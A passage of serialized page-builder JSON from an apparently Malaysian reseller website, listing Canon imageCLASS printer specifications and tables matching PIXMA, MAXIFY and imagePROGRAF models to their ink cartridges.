]<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"f6acb91\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"001a8d3\",\"elType\":\"widget\",\"settings\":{\"title\":\"imageCLASS MF269dw\",\"header_size\":\"h4\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"1a672fd\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/14e8362b0db44a5daaf2af034760fc58_MF269dw-1.png\",\"id\":2725}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"fb9d4fc\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<div class=\\\"overview-head\\\"><p class=\\\"sub-title\\\"><strong>The Multifunction printing solution with Duplex Auto Document Feeder (DADF)<\\/strong><\\/p><\\/div><p>Enjoy greater efficiency. With the duplex auto document feeder, ensure shorter copying and scanning times.<\\/p><ul class=\\\"list-normal\\\"><li>Print, Scan, Copy, Fax<\\/li><li>Print Speed (A4): Up to 28ppm<\\/li><li>Recommended monthly print volume: 250 - 2,500 pages<\\/li><li>FPOT: Approx. 5.2 sec<\\/li><li>Max. paper input capacity: 251 sheets<\\/li><li>Print resolution: 1,200 \\u00d7 1,200 dpi (equivalent)<\\/li><\\/ul><p>[maxbutton id=\\\"11\\\" ]<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"1f6f8ff\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"a880ac9\",\"elType\":\"widget\",\"settings\":{\"title\":\"imageCLASS MF266dn\",\"header_size\":\"h4\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"d63382c\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/f8389aa599cc42db986e698ac364f9fc_MF266dn-1.png\",\"id\":2726}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"73a1481\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<div class=\\\"overview-head\\\"><p class=\\\"sub-title\\\"><strong>The Multifunction printing solution with Mobile Printing and Network<\\/strong><\\/p><\\/div><p>Featuring Network printing and SEND technology, MF266dn is the productive choice for your business operations.<\\/p><ul class=\\\"list-normal\\\"><li>Print, Scan, Copy, Fax<\\/li><li>Print Speed (A4): Up to 28ppm<\\/li><li>Recommended monthly print volume: 250 - 2,500 pages<\\/li><li>FPOT: Approx. 5.2 sec<\\/li><li>Max. paper input capacity: 251 sheets<\\/li><li>Print resolution: 1,200 \\u00d7 1,200 dpi (equivalent)<\\/li><\\/ul><p>[maxbutton id=\\\"11\\\" ]<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"0e45d15\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"04de22f\",\"elType\":\"widget\",\"settings\":{\"title\":\"imageCLASS MF913w\",\"header_size\":\"h4\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"790e84e\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/7583474b04984f42b18e94fe91075ec9_MF913w-1.png\",\"id\":2727}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"880dc7e\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<div class=\\\"overview-head\\\"><p class=\\\"sub-title\\\"><strong>Compact All-in-One with wireless connectivity, bundled with three toner cartridges<\\/strong><\\/p><\\/div><p>Simple solution to your print, scan and copy needs. The small footprint fits desktops with limited space perfectly. Bundled with 3 toners, you can print up to 7,500 pages with low cost per print.<\\/p><ul class=\\\"list-normal\\\"><li>Print, Scan, Copy<\\/li><li>Print Speed (A4): Up to 22ppm<\\/li><li>Recommended monthly print volume: 250 - 2,500 pages<\\/li><li>FPOT: Approx. 6.5 sec<\\/li><li>Max. paper input capacity: Up to 150 sheets<\\/li><li>Print resolution: Up to 2,400 (equivalent) \\u00d7 600 dpi<\\/li><\\/ul><p>[maxbutton id=\\\"11\\\" ]<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"bdfedb6\",\"elType\":\"section\",\"settings\":{\"structure\":\"40\"},\"elements\":[{\"id\":\"55572b6\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"00c113d\",\"elType\":\"widget\",\"settings\":{\"title\":\"imageCLASS MF113w\",\"header_size\":\"h4\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"77e13da\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/e2fa8e1c70b54636a6922a5d483f3250_MF113w-2.png\",\"id\":2728}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"2036878\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<div class=\\\"overview-head\\\"><div class=\\\"overview-head\\\"><div class=\\\"overview-head\\\"><p class=\\\"sub-title\\\"><strong>Compact All-in-One with wireless connectivity<\\/strong><\\/p><\\/div><p>Simple solution to your print, scan and copy needs. The small footprint fits desktops with limited space perfectly. Equipped with built-in Wi-Fi and access point capability.<\\/p><ul class=\\\"list-normal\\\"><li>Print, Scan, Copy<\\/li><li>Print Speed (A4): Up to 22ppm<\\/li><li>Recommended monthly print volume: 250 - 2,500 pages<\\/li><li>FPOT: Approx. 6.5 sec<\\/li><li>Max. paper input capacity: Up to 150 sheets<\\/li><li>Print resolution: Up to 2,400 (equivalent) \\u00d7 600 dpi<\\/li><\\/ul><p>[maxbutton id=\\\"11\\\" ]<\\/p><\\/div><\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"cd5acb3\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"7671e33\",\"elType\":\"widget\",\"settings\":{\"title\":\"imageCLASS LBP913w\",\"header_size\":\"h4\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"d405a8d\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/bebe20358b144d6a9208a36dabdf2a3e_LBP913w-1.png\",\"id\":2730}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"9ac8d27\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<div class=\\\"overview-head\\\"><div class=\\\"overview-head\\\"><p class=\\\"sub-title\\\"><strong>Compact with wireless connectivity, bundled with 3 cartridges<\\/strong><\\/p><\\/div><p>Keep printing simple. The compact size fits desktops with limited space perfectly. Bundled with 3 toners, you can print up to 7,500 pages with low cost per print.<\\/p><ul class=\\\"list-normal\\\"><li>Print<\\/li><li>Print Speed (A4): Up to 22ppm<\\/li><li>Recommended monthly print volume: 250 - 2,500 pages<\\/li><li>First Print Out Time (A4): Approx. 6.5 sec<\\/li><li>Print Resolution: Up to 2,400 (equivalent) \\u00d7 600 dpi<\\/li><li>Mobile Printing<\\/li><\\/ul><p>[maxbutton id=\\\"11\\\" ]<\\/p><\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"98ff69a\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"9dc3933\",\"elType\":\"widget\",\"settings\":{\"title\":\"imageCLASS MF525x\",\"header_size\":\"h4\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"bdbe9d7\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/3fd4600fbc4b454ca6a98e1186caa1a7_imageclass-mf525x_01.png\",\"id\":2731}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"7b20d6b\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<div class=\\\"overview-head\\\"><p>Smarter way to improve office productivity and work efficiency. Equipped with innovative solution in a robust, compact design, the MF525x integrates seamlessly into busy offices and workgroups.<\\/p><ul class=\\\"list-normal\\\"><li>Print, Scan, Copy, Fax<\\/li><li>Print Speed (A4): Up to 43ppm<\\/li><li>Recommended monthly print volume: 2,000 - 7,500 pages<\\/li><li>FPOT: 6.2secs. (A4)<\\/li><li>Max. paper input capacity: Up to 2,300 sheets<\\/li><li>Print Resolution: Up to 1200 x 1200dpi (equivalent)<\\/li><\\/ul><p>[maxbutton id=\\\"11\\\" ]<\\/p><\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"f3b97a6\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"ef6036c\",\"elType\":\"widget\",\"settings\":{\"title\":\"imageCLASS MF426dw\",\"header_size\":\"h4\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"1e51740\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/3ed8c0ae6e8d4e3c9c7122fec0cd35f4_imageclass-mf426dw_b1.png\",\"id\":2732}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"6ca5e93\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<div class=\\\"overview-head\\\"><div class=\\\"overview-head\\\"><p class=\\\"sub-title\\\"><strong>Compact 4-in-1 Black and White Multifunction for the smart business<\\/strong><\\/p><\\/div><p>With cutting-edge features, the MF426dw is set to boost work productivity in the modern office.<\\/p><ul class=\\\"list-normal\\\"><li>Print, Scan, Copy, Fax<\\/li><li>Print Speed (A4): Up to 38ppm<\\/li><li>Recommended monthly print volume: 750 - 4,000 pages<\\/li><li>FPOT: 5.5secs. (A4)<\\/li><li>Max. paper input capacity: Up to 900 sheets<\\/li><li>Print Resolution: Up to 1200 x 1200dpi (equivalent)<\\/li><\\/ul><p>[maxbutton id=\\\"11\\\" ]<\\/p><\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"9f4fce1\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"45b0f85\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"d249821\",\"elType\":\"widget\",\"settings\":{\"title\":\"Cartridge Printers :-\",\"header_size\":\"h3\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"2dd6823\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"d81a183\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"62697a3\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<table width=\\\"378\\\"><tbody><tr><td width=\\\"170\\\"><p><strong>Model<\\/strong><\\/p><\\/td><td width=\\\"208\\\"><p><strong>Cartridge \\/ Bottle<\\/strong><\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>imagePROGRAF PRO-500<\\/p><\\/td><td width=\\\"208\\\"><p>Maintenance Cartridge MC-20<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PFI-50 (Blue)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PFI-50 (Chroma Optimizer)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PFI-50 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PFI-50 (Gray)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PFI-50 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PFI-50 (Matte Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PFI-50 (Photo Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PFI-50 (Photo Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PFI-50 (Photo Gray)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PFI-50 (Photo Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PFI-50 (Red)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PFI-50 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>MAXIFY iB4170<\\/p><\\/td><td width=\\\"208\\\"><p>PGI-2700 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-2700 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-2700 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-2700 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-2700XL (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-2700XL (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-2700XL (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-2700XL (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>MAXIFY MB5070<\\/p><\\/td><td width=\\\"208\\\"><p>PGI-2700 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-2700 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-2700 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-2700 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-2700XL (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-2700XL (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-2700XL (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-2700XL (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>MAXIFY MB5170<\\/p><\\/td><td width=\\\"208\\\"><p>PGI-2700 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-2700 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-2700 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-2700 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-2700XL (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-2700XL (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-2700XL (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-2700XL (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>MAXIFY MB5370<\\/p><\\/td><td width=\\\"208\\\"><p>PGI-2700 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-2700 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-2700 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-2700 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-2700XL (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-2700XL (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-2700XL (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-2700XL (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>MAXIFY MB5470<\\/p><\\/td><td width=\\\"208\\\"><p>PGI-2700 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-2700 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-2700 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-2700 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-2700XL (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-2700XL (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-2700XL (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-2700XL (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA E3170<\\/p><\\/td><td width=\\\"208\\\"><p>CL-57 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CL-57S (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-47 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA E410<\\/p><\\/td><td width=\\\"208\\\"><p>CL-57 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CL-57S (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-47 (Pigment Black)<\\/p><\\/td><\\/tr><\\/tbody><\\/table>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"4c78b87\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"71e2027\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<table width=\\\"378\\\"><tbody><tr><td width=\\\"170\\\"><p><strong>Model<\\/strong><\\/p><\\/td><td width=\\\"208\\\"><p><strong>Cartridge \\/ Bottle<\\/strong><\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA E4270<\\/p><\\/td><td width=\\\"208\\\"><p>CL-57 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CL-57S (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-47 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA E470<\\/p><\\/td><td width=\\\"208\\\"><p>CL-57 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CL-57S (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-47 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA E477<\\/p><\\/td><td width=\\\"208\\\"><p>CL-57S (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-47 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA E480<\\/p><\\/td><td width=\\\"208\\\"><p>CL-57 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-47 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA E510<\\/p><\\/td><td width=\\\"208\\\"><p>CL-98 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-88 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA E560<\\/p><\\/td><td width=\\\"208\\\"><p>CL-99 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-89 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA E560 \\/ E560R<\\/p><\\/td><td width=\\\"208\\\"><p>CL-99 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-89 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA G1000<\\/p><\\/td><td width=\\\"208\\\"><p>GI-790 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>GI-790 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>GI-790 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>GI-790 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA G1010<\\/p><\\/td><td width=\\\"208\\\"><p>GI-790 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>GI-790 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>GI-790 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>GI-790 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA G2010<\\/p><\\/td><td width=\\\"208\\\"><p>GI-790 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>GI-790 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>GI-790 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>GI-790 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA G3000<\\/p><\\/td><td width=\\\"208\\\"><p>GI-790 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>GI-790 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>GI-790 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>GI-790 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA G3010<\\/p><\\/td><td width=\\\"208\\\"><p>GI-790 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>GI-790 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>GI-790 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>GI-790 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA G4010<\\/p><\\/td><td width=\\\"208\\\"><p>GI-790 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>GI-790 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>GI-790 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>GI-790 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA iP100<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-36 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-35 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA iP110<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-36 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-35 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA iP110 (with battery)<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-36 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-35 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA iP1300<\\/p><\\/td><td width=\\\"208\\\"><p>CL-41 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-40 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-40\\/CL-41 Value Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA iP2770 \\/ iP2772<\\/p><\\/td><td width=\\\"208\\\"><p>CL-811 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CL-811XL (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810 Twin Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810\\/CL-811 Value Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810XL (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA iP2870S<\\/p><\\/td><td width=\\\"208\\\"><p>CL-746 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CL-746S (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-745 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-745S (Pigment Black)<\\/p><\\/td><\\/tr><\\/tbody><\\/table>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"13e8990\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"70107ac\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<table width=\\\"378\\\"><tbody><tr><td 